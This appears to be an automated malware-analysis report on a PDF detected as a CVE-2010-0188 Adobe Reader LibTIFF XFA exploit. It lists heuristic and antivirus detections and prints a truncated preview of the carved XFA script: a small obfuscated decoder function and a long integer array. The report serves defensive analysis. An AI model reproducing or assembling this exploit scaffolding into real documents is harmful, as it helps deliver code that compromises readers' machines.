MALICIOUS
182
Risk Score
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 6
-
Adobe Reader LibTIFF XFA image exploit — CVE-2010-0188 [critical · CVE likely · CVE_2010_0188] PDF contains the CVE-2010-0188 exploit template: XFA JavaScript heap-spray setup, a generated TIFF image payload, and assignment of that TIFF data to an XFA image field rawValue to trigger Adobe Reader's LibTIFF parser.
-
ClamAV: Pdf.Exploit.Agent-6136306-0 [critical · CLAMAV_DETECTION] ClamAV detected this file as malware: Pdf.Exploit.Agent-6136306-0
-
Malformed active-content stream length [medium · PDF_MALFORMED_EXPLOIT_STREAM_LENGTH] A PDF stream that carries active/exploit-looking content has a declared /Length that does not match the recovered stream body. Malformed stream boundaries and length mismatches are common parser-evasion techniques and serve as supporting evidence around Reader exploit streams.
-
XFA form [low · PDF_XFA] PDF uses XML Forms Architecture — can contain script logic
-
Embedded script payload in PDF stream [info · PDF_EMBEDDED_SCRIPT_PAYLOAD] PDF stream bytes contain an HTML/XFA <script> tag without accompanying Windows shell-execution primitives — common in accessible XFA forms but worth surfacing for analyst review.
-
Embedded URL [info · EMBEDDED_URL] One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL: http://www.xfa.org/schema/xfa-template/2.5/ — found in PDF document text. The same string appears as the xmlns value of the <template> element in the extracted script preview below.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| embedded_pdf_script_00000346.bin | pdf-embedded-script | PDF raw stream script payload at offset 0x346 | 103631 bytes |

SHA-256: cb795dbdbf17b489f18aa3a0df2ff672c64dbfe4977edf343b6d42074bf15ceb
Preview script: first 1,000 lines of the extracted script
<test:xdp xmlns:test="http://ns.adobe.com/xdp/"> <asd/>as<config xmlns='123'><asd/> <test:present> <pdf > <test:interactive>1</test:interactive> <int>0</int> a <asd/>a<test:version>1.5</test:version> a<asd/> </pdf> </test:present> <asd/></config><asd/> <template xmlns='http://www.xfa.org/schema/xfa-template/2.5/'> <asd/> a<subform name="a1"> <pageSet> <pageArea id="roteYom" name="roteYom"> <contentArea h="512pt" w="214pt" x="0.25in" y="0.25in"/> <medium long="792pt" short="612pt" stock="default"/> </pageArea> </pageSet> <asd/>a <subform name='asdvsa'> a<asd/>a<field name='qwe123b'><event activity='initialize'> <script contentTyp='application' contentType='application/x-javascript'> 
// [analyst annotation — not part of the carved sample]
// test3: takes no arguments and works only on globals.
//   - if `s` is truthy, `v` is refreshed from `ar[z]`; otherwise `v` keeps its prior value
//   - `cc[v+4]` is then appended to `s`
// `ar` is the integer array assigned directly below; its visible entries go as low as -4,
// so `v+4` stays a non-negative index for them. `s`, `v`, `z` and `cc` are not declared
// anywhere in the visible preview.
// NOTE(review): this looks like one step of a table-driven string decoder — the calling
// loop and the contents of `cc` are outside this preview; confirm against the full artifact.
function test3(){if(s)v=ar[z];s=s+cc[v+4];}
ar=[-4, -3,
-2,
-1, 0,
-3,
1,
1,
2,
3,
4,
5, -4, -3,
-2,
-1,
6,
6,
6,
7,
-1,
8,
8,
8,
7,
-1, 1,
1,
1,
7, -1,
9,
9,
9,
7,
-1,
10,
10, 10, 7,
-1,
4,
4,
4,
7,
-1,
11, 11, 11,
5,
-4,
-3,
-2, -1, 0,
12,
2,
3,
13, 9,
-2, 14,
15,
-3,
7,
-1,
2,
5,
-4,
-3,
-2,
-1,
16,
-1,
17,
-1,
3,
9,
18, -1,
19,
-2,
-2, -3,
20, 21,
22,
5,
-4,
-3,
-2,
-1,
20,
-1,
17,
-1,
3,
9,
18,
-1,
19,
-2,
-2,
-3,
20,
21,
22,
5,
-4, -3,
-2,
-1, 15,
23,
24,
17,
25,
26,
8,
27,
28,
29,
28,
28, 10, 28,
30, 24,
31, 32,
28,
26,
-3,
33,
8,
27,
28,
29, 28,
28,
10, 28,
10,
29,
33, 32,
28,
26,
-3,
-3,
33,
9,
6,
32,
28,
26,
-3,
33,
28,
27,
28, 32,
27,
26,
-3,
29,
9,
27,
10,
32,
28,
26,
-3,
26, 24,
26, 24,
26,
24,
26,
24,
27,
29,
28,
28,
28,
28,
28,
28,
28, 28,
28,
28,
28,
28,
28,
28,
28,
28,
28,
28, 28,
28,
28,
28,
28,
28,
28,
28,
28,
28,
28, 28,
24,
27, 33,
34,
32,
28,
26, -3, 29,
26, 27,
28,
29,
28,
28,
10, 28,
28,
28,
26,
28, 28,
28,
28,
26,
24,
26, 24, 26,
24,
26,
24,
26,
24, 26,
24,
26,
24,
26,
24,
29,
29,
32, 33,
9, 26,
10,
8,
10,
8,
32,
30,
9, 26, 31,
30,
33,
26,
9,
34, 30, 10,
33,
33,
8,
28,
29,
26,
32,
6,
26,
28,
33, 28,
32, 6,
26,
28,
28,
8,
32,
6,
31, 28,
24,
8,
30,
29,
32,
6,
31, 29,
28,
32, 33,
33,
1, 6, 29,
29, 32, 6,
30,
9, 33,
8,
28,
33, 31,
26,
33, 33,
27, 8,
32,
24,
9, 9,
24,
30,
24,
28,
10,
10,
10,
10,
6,
32,
32,
6,
26, 28, 33, 28,
8,
33,
26,
29,
33,
34,
28,
29, 31, 30, 10,
6, 32, 31,
33,
26, 27,
26,
32, 30,
9, 26,
31,
30,
30,
24, 9,
34,
9,
6,
26,
8,
30,
24, 30,
29,
32,
6,
31,
30,
33,
8,
32,
6,
31,
26,
33,
30, 31,
32,
28,
33,
10,
30,
30, 29, 32,
6,
31,
29,
27,
28,
28,
33,
10,
30,
33,
33, 8,
34,
26,
34,
26,
24, 10,
8,
-3,
1,
28,
33,
8,
30,
33, 33, 1,
6,
28,
10,
6,
9,
24,
28, 33,
32,
10,
27,
31, 26,
28, 32,
8,
24,
8,
6,
28,
1, 28,
33, 1,
-3,
26, 28,
9,
6,
10,
24, 33,
6,
24,
10,
31,
30,
9,
29, 30, 9,
32,
6,
30,
9,
27,
26,
28,
33, 1,
1,
29, 29,
32,
6, 28,
8, 26, 6, 32,
1, 26, 29,
9,
8,
10,
10, 30,
26,
27,
26,
28,
8,
32,
6, 1,
32,
28,
33,
1,
1,
32, 6,
28,
26,
32, 6,
28, 33,
8,
30,
-3,
6,
30,
9,
30,
34, 8,
33,
9,
6,
30,
33,
-3,
1,
32,
6,
29,
32, 27,
28,
32,
28,
31,
1,
28,
8, 33, 33, 31,
26,
28,
33, 34,
29, 9,
6,
10,
33,
32,
6, 29,
32,
28,
32,
32, 6,
10,
31,
29, -3, 28,
30,
30,
34,
9,
32,
34,
32,
10, 10,
10,
10,
10,
10,
9, 27,
10,
34,
9, 32,
28,
28,
28, 28,
28,
28,
28, 28, 30,
32, 30,
28, 29,
-3, 26,
28,
29, 32,
10,
10,
28,
28, 28,
28,
28,
28,
30, 28, 32,
33, 8,
28, 24,
34, 30,
28,
30, 30,
32, 6,
9, 8,
32, 6,
30,
9,
24,
28, 32,
33, 8,
33, 28,
30,
10,
10,
9,
33,
29,
32,
29,
10,
29, 9,
28,
28,
28, 28,
29,
32, 31,
30,
31, 27, 29,
8,
29,
1,
30, 26,
10,
10, 24, 29,
32,
33,
8,
26,
28,
32, 32,
6, 9,
32, 9,
32, 29,
24,
10,
10, 10,
10,
10,
10,
9,
6, 28,
27,
9,
6,
31,
27,
32, 24,
9,
8,
28,
26, 28,
24, 28, 28,
28,
28,
32, 1, 30,
8,
27, 26,
28,
8,
8, 31,
28,
26,
27,
26,
31, 27, 29,
30, 29, 31,
31,
33,
8,
31, 26,
26,
27,
26,
28,
26,
31,
29,
31,
27, 33,
33,
33, 27,
8,
31, 26,
26,
27,
26,
28,
32,
27,
28,
27,
1,
31,
33,
27, 28,
30,
33,
29,
32,
10,
32,
28,
28,
28,
28,
28,
28,
10,
10, 30,
29, 28, 8,
32,
6,
9,
32, 33,
33, 8,
34,
30,
24,
8,
31,
26,
26,
24,
1,
28,
28,
31, 31,
31,
28,
29,
27,
31,
26,
8,
31, 26,
26,
24,
1,
28,
30, 27,
9, 29,
26,
29,
8,
29,
8,
8, 29,
26,
26,
24,
1,
28,
34,
28, 28, 30,
34,
32,
-3,
8, 24,
28,
26,
33,
28,
32,
32, 26,
26,
24,
1,
28,
26,
26,
24,
30,
24,
29,
-3,
28,
28, 29,
-3,
28,
28,
30,
33,
30,
31,
29,
-3, 28,
28,
10, 10,
30,
29, 24,
26,
32,
30,
8,
28,
31,
30,
24, 29, 29,
-3,
28,
28,
30,
33,
10,
10,
30, 29,
28,
26,
29,
-3,
28,
28,
32,
33, 9,
6, 28, 8,
30,
33,
10, 10,
30,
29,
28,
26,
32,
33,
8, 33,
28,
8,
9,
6,
28,
27,
9,
6,
24,
33,
26,
31, 32,
28,
33,
10, 28,
28,
31, 30,
10,
-3,
26,
31,
32,
28,
33, 10,
28,
28,
31, 30,
8,
26,
29,
-3, 28,
28,
29,
-3,
10,
9,
10, 10,
30, 29,
28,
32,
9, 32,
34,
8,
10,
9,
10,
10, 10,
10,
32, 9,
26,
9, 28,
9,
9,
8,
34,
32, 10,
9,
32,
-3,
28, 9,
32,
34,
29,
10,
28,
24,
6,
1,
33,
33, 8,
-3,
32, -3,
30,
6, 24,
6,
8,
29,
26, 29,
31,
34,
33, 29,
24,
-3, 27,
10, 31,
28,
29, 32,
31,
26,
31,
26,
31, 28,
33, -3,
27, 10,
27,
10,
33,
24,
33,
26,
33, 29,
27,
9,
33,
24,
33,
32,
33,
30,
27,
9,
33,
27,
33, 26,
33,
26,
27, 9, 33,
24,
33, 26,
27,
10,
31,
31,
27, 9,
31,
28,
29,
32,
31,
28,
33,
10, 29,
29,
33, 1,
33,
27, 33,
29,
33,
31,
27,
10, 27,
29,
29,
30,
33,
1,
33, 26,
28, 28, 28,
28,
25,
5, -4,
-3, -2, -1,
15,
23, 27,
17,
25,
26, 8, 27,
28,
29, 28,
28,
10,
-3,
30,
29,
33, 32,
28,
26,
-3,
33,
8,
27, 28,
29,
28,
28,
10,
34,
29,
27,
24,
32,
28,
26,
-3,
34,
28,
24,
10,
32,
28,
26,
-3,
33,
28, 34,
28,
32,
26,
26,
-3,
31,
1,
31,
9, 32,
28,
26,
-3,
26,
24,
26,
24,
26, 24,
26,
24,
27,
29,
28,
28,
28,
28,
28,
28,
28, 28,
28,
28,
28,
28, 28, 28, 28,
28, 28,
28,
28,
28,
28, 28, 28,
28,
28, 28,
28,
28,
28,
28,
31, 24,
32,
32, 32,
28, 26, -3,
29,
26,
27,
28,
29,
28, 28,
10,
28,
28,
28,
26, 28,
28,
28,
28, 26,
24,
26,
24,
26,
24,
26,
24, 26,
24,
26,
24,
26, 24,
26,
24, 29,
29,
32,
33,
9, 26, 10,
8, 10,
8,
32, 30, 9,
26,
31,
30, 33, 26,
9, 34,
30,
10,
33,
33,
8,
28,
29,
26, 32,
6,
26,
28,
33,
28, 32, 6,
26, 28,
28,
8,
32,
6,
31,
28,
24, 8,
30,
29, 32,
6,
31,
29,
28,
32,
33,
33, 1,
6,
29,
29,
32,
6, 30,
9,
33,
8, 28,
33,
31,
26,
33, 33,
27,
8,
32, 24,
9,
9,
24,
30,
24,
28,
10,
10,
10,
10,
6, 32,
32,
6,
26,
28,
33,
28,
8,
33,
26,
29,
33,
34,
28,
29,
31,
30, 10,
6,
32,
31,
33, 26,
27, 26,
32,
30,
9,
26,
31,
30,
30,
24,
9, 34,
9, 6,
26,
8,
30,
24,
30,
29,
32,
6,
31,
30,
33,
8, 32, 6,
31,
26,
33, 30,
31,
32,
28, 33,
10,
30,
30,
29,
32, 6,
31,
29,
27,
28,
28,
33, 10, 30, 33,
33,
8, 34, 26,
34, 26,
24,
10, 8,
-3, 1,
28, 33,
8,
30,
33,
33, 1,
6,
28,
10,
6,
9,
24, 28,
33,
32, 10,
27,
31, 26,
28, 32, 8,
24,
8,
6,
28,
1,
28,
33, 1, -3,
26, 28,
9,
6,
10,
24,
33,
6, 24,
10, 31,
30,
9,
29,
30,
9,
32,
6,
30, 9, 27,
26, 28,
33,
1,
1,
29,
29,
32,
6,
28, 8,
26,
6,
32,
1,
26,
29,
9, 8,
10,
10, 30,
26,
27,
26,
28,
8,
32,
6, 1, 32,
28,
33,
1,
1,
32,
6,
28,
26,
32,
6,
28,
33,
8,
30,
-3,
6,
30, 9, 30,
34,
8,
33,
9,
6,
30,
33, -3,
1,
32,
6,
29,
32, 27,
28, 32,
28,
31, 1,
28,
8,
33,
33, 31, 26,
28, 33,
34, 29,
9,
6,
10,
33, 32, 6,
29,
32,
28,
32,
32,
6,
10, 31,
29,
-3,
28,
30,
30,
34,
9,
32,
34, 32,
10,
10, 10, 10,
10, 10,
9,
27,
10,
34,
9,
32,
28,
28,
28, 28,
28,
28,
28,
28, 30,
32, 30,
28,
29,
-3,
26,
28,
29,
32,
10,
10,
28,
28,
28,
28,
28,
28,
30, 28, 32, 33,
8,
28,
24, 34,
30,
28,
30,
30, 32,
6,
9, 8,
32,
6,
30, 9,
24,
28,
32,
33,
8,
33, 28,
30,
10, 10,
9,
33, 29,
32,
29,
10, 29,
9,
28,
28,
28, 28,
29,
32, 31,
30,
31,
27,
29,
8,
29,
1,
30,
26,
10,
10,
24,
29,
32, 33,
8,
26, 28,
32,
32,
6,
9,
32,
9,
32,
29, 24,
10,
10,
10,
10,
10,
10,
9,
6,
28,
27,
9,
6,
31, 27,
32,
24,
9, 8,
28,
26,
28,
24,
28, 28,
28,
28,
32, 1,
30,
8,
27,
26,
28,
8,
8,
31,
28,
26,
27,
26,
31,
27,
29, 30, 29,
31,
31,
33, 8,
31,
26,
26, 27,
26,
28,
26,
31,
29,
31,
27, 33,
33, 33,
27, 8, 31,
26,
26, 27,
26,
28,
32,
27,
28,
27,
1, 31,
33,
27,
28,
30,
33,
29,
32,
10,
32,
28,
28,
28,
28,
28,
28, 10, 10,
30,
29,
28,
8,
32, 6,
9, 32,
33,
33, 8,
34, 30,
24, 8,
31,
26, 26, 24, 1,
28,
28,
31,
31, 31,
28,
29, 27,
31,
26, 8,
31,
26,
26,
24,
1,
28,
30, 27, 9,
29,
26, 29,
8,
29,
8,
8,
29,
26,
26,
24,
1,
28, 34, 28, 28,
30, 34, 32,
-3, 8,
24,
28,
26, 33,
28, 32,
32,
26,
26, 24,
1,
28,
26,
26,
24,
30,
24,
29,
-3,
28, 28,
29,
-3,
28,
28,
30,
33,
30, 31,
29, -3,
28,
28,
10, 10,
30,
29,
24,
26,
32, 30,
8,
28,
31,
30,
24,
29,
29, -3,
28,
28,
30,
33,
10, 10,
30,
29,
28, 26, 29,
-3,
28,
28, 32,
33,
9,
6,
28,
8, 30,
33, 10,
10,
30,
29,
28, 26, 32,
33,
8, 33,
28,
8, 9,
6,
28,
27,
9, 6,
24,
33,
26,
31, 32, 28,
33, 10,
28,
28, 31,
30,
10,
-3,
26,
31,
32,
28,
33, 10, 28,
28, 31,
30,
8,
26,
29,
-3,
28,
28, 29, -3, 10,
9, 10, 10,
30, 29,
28, 32, 9, 32,
34,
8,
10,
9,
10, 10,
10, 10,
32, 9, 26,
9,
28, 9,
9, 8,
34, 32,
10,
9,
32,
-3,
28, 9,
32,
34,
29, 10,
28, 24, 6,
1,
33, 33,
8,
-3,
32,
-3,
30,
6,
24,
6,
8,
29,
26,
29,
31,
34,
33,
29, 24,
-3,
27,
10,
31,
28,
29,
32,
31,
26, 31,
26, 31,
28, 33, -3,
27,
10, 27,
10,
33,
24, 33,
26,
33,
29,
27,
9,
33,
24,
33,
32, 33,
30,
27,
9,
33,
27,
33,
26,
33, 26,
27,
9, 33,
24,
33,
26,
27,
10, 31,
31,
27,
9,
31, 28,
29,
32,
31, 28, 33,
10,
29,
29,
33,
1,
33,
27,
33, 29,
33,
31,
27, 10,
27, 29,
29,
30,
33,
1,
33,
26,
28,
28, 28,
28,
25,
5,
15, 23,
33,
17,
-3,
0,
0, 5, 15,
23,
26,
17,
3,
9,
18,
-1,
19,
-2,
-2,
-3,
20,
21,
22, 5,
10,
35,
3,
8,
13,
2, 12,
3,
-1,
15,
23,
30,
21, 22,
36,
-4,
-3,
-2, -1,
15,
23,
29,
17,
15,
23,
33,
37,
-4,
2, 9,
18,
9,
-2,
38,
9,
-2,
14,
2,
12, 3, 37,
13, 12, 39, 13,
-2,
2,
3,
4,
21,
22,
5,
15,
23,
29,
17,
15,
23,
29,
37,
-2,
9,
0,
23, -3,
8,
9,
21,
40,
37,
40,
7,
40,
40,
22, 5,
18,
11,
2,
23,
9,
21,
15, 23,
29,
37,
23,
9,
3,
4, 13,
11,
41,
26,
22,
15,
23,
29,
42,
17, 40,
28,
40,
5,
-2,
9,
13,
35,
-2,
3, -1,
0,
-3,
-2,
14,
9,
43,
3, 13,
21, 15,
23,
29,
7,
24,
28,
22,
44,
10, 35,
3,
8, 13, 2,
12,
3,
-1,
15,
23,
31, 21,
15,
23,
32, 7,
15,
23,
34,
22,
36,
18,
11,
2,
23,
9,
21,
15,
23,
32, 37,
23,
9, 3,
4,
13,
11,
45,
27,
41,
15,
23, 34,
22,
15,
23,
32,
42,
17, 15,
23,
32,
5, -2,
9,
13, 35,
-2,
3,
-1,
15,
23,
32, 37,
14,
35,
6,
14, 13, -2,
2,
3,
4,
21,
28,
7,
15,
23, 34,
46,
27, 22,
44,
10,
35, 3,
8,
13,
2,
12,
3,
-1,
15, 43, 28,
21,
15,
43, 24,
22,
36,
15,
43,
24,
17, 35,
3,
9,
14,
8,
-3,
0,
9,
21,
15,
43,
24,
22,
5, -2,
12,
13,
9,
47,
-3,
48,
17,
15,
43, 24,
37,
23,
9,
3,
4,
13,
11,
45,
27,
5,
1,
-3,
48, ... (truncated) |
|||